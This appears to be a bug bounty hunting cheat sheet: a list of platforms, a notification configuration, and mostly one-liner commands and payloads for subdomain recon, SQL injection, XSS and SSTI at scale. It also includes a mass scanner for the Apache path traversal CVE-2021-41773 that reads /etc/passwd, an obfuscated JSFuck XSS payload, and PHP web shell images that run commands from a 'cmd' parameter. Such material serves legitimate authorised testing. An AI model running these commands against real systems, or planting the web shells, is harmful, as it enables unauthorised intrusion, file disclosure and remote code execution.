- Automated Subdomain Monitoring
- Burp Suite Extensions
- JavaScript
- Enumerate Subdomains, Web Servers and API Endpoints
- Find CNAME Records
- Find hidden Parameters in JavaScript Files
- Find JavaScript Files with gau and httpx
- Find Open Redirects
- Find Secrets in JavaScript Files
- Find Subdomains based on Certificates
- Find SQL-Injection (SQLi) at Scale
- Find basic SQL-Injection (SQLi), Cross-Site Scripting (XSS) and Server-Side Template Injection (SSTI) Vulnerabilities with Magic Payload
- Find Cross-Site Scripting (XSS) at Scale
- Fingerprinting with Shodan and Nuclei
- Hunting Checklist
- Path Traversal Zero-Day in Apache HTTP Server (CVE-2021-41773)
- Server-Side Template Injection (SSTI) at Scale
- Wayback Machine
- Web Shell / Malicious Images
- Wordpress Configuration Disclosure
- Cross-Site Scripting (XSS)
Name | Description | URL |
---|---|---|
Bug Crowd | Bug Bounty Platform | https://www.bugcrowd.com |
CrowdStream | CrowdStream is a showcase of accepted and disclosed submissions on participating programs. | https://bugcrowd.com/crowdstream?filter=disclosures |
disclose.io | We're here to make vulnerability disclosure safe, simple, and standardized for everyone. | https://disclose.io |
HackerOne | Bug Bounty Platform | https://www.hackerone.com |
Hacktivity | See the latest hacker activity on HackerOne | https://hackerone.com/hacktivity |
InfoSecHub | n/a | https://linksshare.io |
Intigriti | Bug Bounty Platform | https://www.intigriti.com |
$ go install -v github.com/hakluke/haktrails@latest
$ go install -v github.com/tomnomnom/anew@latest
$ go install -v github.com/projectdiscovery/notify/cmd/notify@latest
$ vi ~/.config/haktools/haktrails-config.yml
securitytrails:
key: <API_KEY>
$ vi ~/.config/notify/provider-config.yaml
slack:
- id: "slack"
slack_channel: "recon"
slack_username: "test"
slack_format: "{{data}}"
slack_webhook_url: "https://hooks.slack.com/services/XXXXXX"
- id: "vulns"
slack_channel: "vulns"
slack_username: "test"
slack_format: "{{data}}"
slack_webhook_url: "https://hooks.slack.com/services/XXXXXX"
discord:
- id: "crawl"
discord_channel: "crawl"
discord_username: "test"
discord_format: "{{data}}"
discord_webhook_url: "https://discord.com/api/webhooks/XXXXXXXX"
- id: "subs"
discord_channel: "subs"
discord_username: "test"
discord_format: "{{data}}"
discord_webhook_url: "https://discord.com/api/webhooks/XXXXXXXX"
telegram:
- id: "tel"
telegram_api_key: "XXXXXXXXXXXX"
telegram_chat_id: "XXXXXXXX"
telegram_format: "{{data}}"
telegram_parsemode: "Markdown" # None/Markdown/MarkdownV2/HTML (https://core.telegram.org/bots/api#formatting-options)
pushover:
- id: "push"
pushover_user_key: "XXXX"
pushover_api_token: "YYYY"
pushover_format: "{{data}}"
pushover_devices:
- "iphone"
smtp:
- id: email
smtp_server: mail.example.com
smtp_username: test@example.com
smtp_password: password
from_address: from@email.com
smtp_cc:
- to@email.com
smtp_format: "{{data}}"
subject: "Email subject"
smtp_html: false
smtp_disable_starttls: false
googlechat:
- id: "gc"
key: "XXXXXXXX"
token: "XXXXXX"
space: "XXXXXX"
google_chat_format: "{{data}}"
teams:
- id: "recon"
teams_webhook_url: "https://<domain>.webhook.office.com/webhookb2/xx@xx/IncomingWebhook/xx"
teams_format: "{{data}}"
custom:
- id: webhook
custom_webhook_url: http://host/api/webhook
custom_method: GET
custom_format: '{{data}}'
custom_headers:
Content-Type: application/json
X-Api-Key: XXXXX
custom:
- id: webhookJson
custom_webhook_url: http://host/api/webhook
custom_method: GET
custom_format: '{"text":{{dataJsonString}} }'
custom_headers:
Content-Type: application/json
X-Api-Key: XXXXX
custom:
- id: webhook
custom_webhook_url: http://host/api/webhook
custom_method: GET
custom_sprig: '{"text":"{{ .url }}"}'
custom_headers:
Content-Type: application/json
X-Api-Key: XXXXX
$ while :; do echo <DOMAIN> | haktrails subdomain | anew subdomains.txt; sleep 86400; done | notify
- JS Link Finder
- Upload Scanner
- Turbo Intruder
- HTTP Request Smuggler
- Auth Analyzer
![] // false
!![] // true
[][[]] // undefined
+[![]] // NaN
+[] // 0
+!+[] // 1
!+[]+!+[] // 2
[] // Array
+[] // Number
[]+[] // String
![] // Boolean
[]["filter"] // Function
[]["filter"]["constructor"]( <CODE> )() // eval
[]["filter"]["constructor"]("<FOOBAR>")() // window
<img src onerror="(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[]) [+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]++[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]]">
$ subfinder -d <DOMAIN> -silent | /home/<USERNAME>/go/bin/httpx -silent -o <DOMAIN>_httpx.txt; for i in $(cat <DOMAIN>_httpx.txt); do DOMAIN=$(echo $i | /home/<USERNAME>/go/bin/unfurl format %d); ffuf -u $i/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/api/api-endpoints.txt -o ${DOMAIN}_ffuf.txt; done
$ for ip in $(cat <FILE>.txt); do dig asxf %ip | grep CNAME; done
Find hidden Parameters in JavaScript Files
$ assetfinder <DOMAIN> | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"
$ echo http://<DOMAIN> | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'
$ echo "http://<RHOST>" | gau | grep =http | php -r "echo urldecode(file_get_contents('php://stdin'));"
$ subfinder -d <DOMAIN> -silent | /home/<USERNAME>/go/bin/httpx -silent -o <DOMAIN>_httpx.txt; for i in $(cat <DOMAIN>_httpx.txt); do DOMAIN=$(echo $i | /home/<USERNAME>/go/bin/unfurl format %d) | cat <DOMAIN>_httpx.txt | nuclei -t /home/<USERNAME>/opt/03_web_application_analysis/nuclei-templates/exposures/tokens -o token-expose.txt; done
$ curl -s https://crt.sh/\?q\=<DOMAIN>\&output\=json | jq . | grep 'name_value' | awk '{print $2}' | sed -e 's/"//g'| sed -e 's/,//g' | awk '{gsub(/\\n/,"\n")}1' | sort -u
$ subfinder -d <DOMAIN> -silent -all | httpx -silent -threads 100 | katana -d 4 -jc -ef css,png,svg,ico,woff,gif | tee -a <FILE>
$ cat <FILE> | gf sqli | tee -a <FILE>
$ while read line; do sqlmap -u $line --parse-errors --current-db --invalid-logical --invalid-bignum --invalid-string --risk 3; done < <FILE>
Find basic SQL-Injection (SQLi), Cross-Site Scripting (XSS) and Server-Side Template Injection (SSTI) Vulnerabilities with Magic Payload
'"><svg/onload=alert()>{{7*7}}
$ echo <DOMAIN> | gau | while read url; do python3 xsstrike.py -u $url --crawl -l 4 -d 5; done
$ echo <DOMAIN> | katana | while read url; do python3 xsstrike.py -u $url --crawl -l 4; done
$ subfinder -d <DOMAIN> -all -silent | httpx -silent | katana -silent | Gxss -c 100 | dalfox pipe --skip-bav --skip-mining-all --skip-grepping
$ shodan domain <DOMAIN> | awk '{print $3}' | httpx -silent | nuclei -t /PATH/TO/TEMPLATES/nuclei-templates/
- Find Subdomains
- Check
CNAME Records
of those subdomains and check forSubdomain Takeover
- Use
WaybackUrls
for URLs
- Use
MassScan
forPort Scanning
- Do
Github
recon
- Check for
CORS Misconfiguration
- Check for
Email Header Injection
onPassword Reset Function
- Check for
SMTP
andHOST Header Injection
- Check for
IFRAMEs (Clickjacking)
- Check for
Improper Access Control
andParamter Tampering
- Check
Burp History
for finding endpoint - Use
Arjun
for finding hidden endpoints - Check for
Client-Side Request Forgery (CSRF)
- Check for
Server-Side Request Forgery (SSRF) Parameters
- Check for
Cross-Site Scripting (XSS)
andServer-Side Template Injection (SSTI)
- Check
Cryptography
inReset Password Token
- Check for
Unicode Injection
inEmail Parameters
- Check for
Bypassing Rate Limits
X-Originating-IP:IP X-Forwarded-For:IP X-Remote-IP:IP X-Remote-Addr:IP X-Client-IP:IP X-Forwarded-Host:IP
- Perform
Directory Busting
- Check for
HTTP Request Smuggling
- Check for
Open Redirect
throughWaybackUrls
- Check for
Social-Signon Bypass
- Check for
state parameter
inSocial Sign-In
& check whether it's possible to causeDenial of Service (DoS)
usingMultiple Cookie Injection
- Check for
File Upload
: CSRF, XSS, SSRF, RCE, LFI, XXE - Check for
Buffer Overflow
$ cat <FILE>.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
$ echo "<DOMAIN>" | subfinder -silent | waybackurls | gf ssti | qsreplace "{{''.class.mro[2].subclasses()[40]('/etc/hostname').read()}}" | parallel -j50 -q curl -g | grep "root:x"
- Access https://web.archive.org/
- Type in the desired domain
- Switch to the URL tab https://web.archive.org/web/*/https://*
- Apply the filter
%40
$ echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > <FILE>.jpg
$ echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > <FILE>.png
$ subfinder -silent -d http://<DOMAIN> | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8088 -path "/wp-config.PHP" -mc 200 -t 60
Note that HTML tags
that need to be closed for XSS
.
<!--
<title>
<textarea>
<style>
<noscript>
<xmp>
<template>
<noembed>
--></title></textarea></style></noscript></script></xmp></template></noembed><svg/onload=alert()>